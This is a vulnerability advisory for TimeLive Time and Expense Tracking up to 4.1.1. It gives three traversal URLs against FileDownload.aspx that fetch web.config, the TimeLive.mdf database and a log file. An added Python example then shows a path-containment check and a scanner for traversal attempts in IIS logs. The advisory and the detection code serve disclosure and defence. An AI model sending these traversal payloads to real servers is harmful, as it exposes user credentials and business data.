Title: TimeLive Time and Expense Tracking <= 4.1.1 Multiple Vulnerabilities
Vulnerability class: Directory Traversal / Remote Database Download / File Download / Source Code Disclosure
Author: Nathaniel Carew
Severity: High
Download URL: http://www.livetecs.com/Release/TimeLiveWebSetup.exe
Platform: ASP.NET
Version: 4.1.1
Tested on: Windows Server Standard 2003 SP2 / IIS 6
Credits: Peregrinus & shiznat
Overview:
---------
When using the import/export feature for CSV/project/QuickBooks files under:
http://<host>/TimeLive/AccountAdmin/AccountImportExport.aspx
you are able to modify the file download URL you are redirected to
and traverse directories to download files hosted on the server, including the TimeLive database:
Proof of Concept:
-----------------
http://<host>/TimeLive/Shared/FileDownload.aspx?FileName=..\web.config
http://<host>/TimeLive/Shared/FileDownload.aspx?FileName=..\App_Data\TimeLive.mdf
http://<host>/TimeLive/Shared/FileDownload.aspx?FileName=..\Log\TimeLive.log
Impact:
-------
Successful exploitation could allow an attacker to download the complete database of user information,
including email addresses, usernames and passwords and the associated timesheet and expense data, along with
any files contained within the subfolders of wwwroot.
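The root cause above is a download handler that joins an unchecked FileName parameter onto a folder path. The following is an added example, not code from the advisory or from TimeLive, showing the containment check such a handler needs (a normalised path must stay under the export folder) and the same check applied to constructed IIS W3C log lines to flag the traversal requests; the DOWNLOAD_ROOT path and the log lines are assumptions made for the example.

```python
import posixpath
import re
from typing import List, Optional
from urllib.parse import unquote

# Assumed export folder for the download handler (constructed for this example;
# the advisory does not say where TimeLive stores exported files).
DOWNLOAD_ROOT = "/inetpub/wwwroot/TimeLive/Shared/Exports"


def resolve_download(file_name: str) -> Optional[str]:
    """Return the on-disk path for a FileName parameter, or None when the
    request would escape DOWNLOAD_ROOT (..\, ../, encoded or absolute forms)."""
    # Decode twice: IIS decodes once, a second pass catches %252e%252e.
    name = unquote(unquote(file_name)).replace("\\", "/")
    if not name or name.startswith("/") or re.match(r"^[A-Za-z]:", name):
        return None  # empty, rooted or drive-letter paths are never valid names
    candidate = posixpath.normpath(posixpath.join(DOWNLOAD_ROOT, name))
    # Containment check after normalisation: "..\web.config" collapses to a
    # path outside the export folder and is rejected here.
    if not candidate.startswith(DOWNLOAD_ROOT + "/"):
        return None
    return candidate


# Constructed IIS W3C log lines (date time cs-method cs-uri-stem cs-uri-query sc-status).
SAMPLE_LOG = """\
2011-05-02 10:01:07 GET /TimeLive/Shared/FileDownload.aspx FileName=Export_2011.csv 200
2011-05-02 10:02:19 GET /TimeLive/Shared/FileDownload.aspx FileName=..\\web.config 200
2011-05-02 10:02:44 GET /TimeLive/Shared/FileDownload.aspx FileName=..%5CApp_Data%5CTimeLive.mdf 200
2011-05-02 10:03:10 GET /TimeLive/Default.aspx - 200
"""


def find_traversal_attempts(log_text: str) -> List[str]:
    """Return the query strings of FileDownload.aspx requests whose FileName
    fails the containment check, i.e. the traversal attempts in the log."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 6 or not parts[3].lower().endswith("/filedownload.aspx"):
            continue
        match = re.search(r"(?i)filename=([^&]*)", parts[4])
        if match and resolve_download(match.group(1)) is None:
            hits.append(parts[4])
    return hits
```

A 200 status on a flagged line means the file was actually served, which is the case to treat as a confirmed database or configuration disclosure rather than a blocked probe.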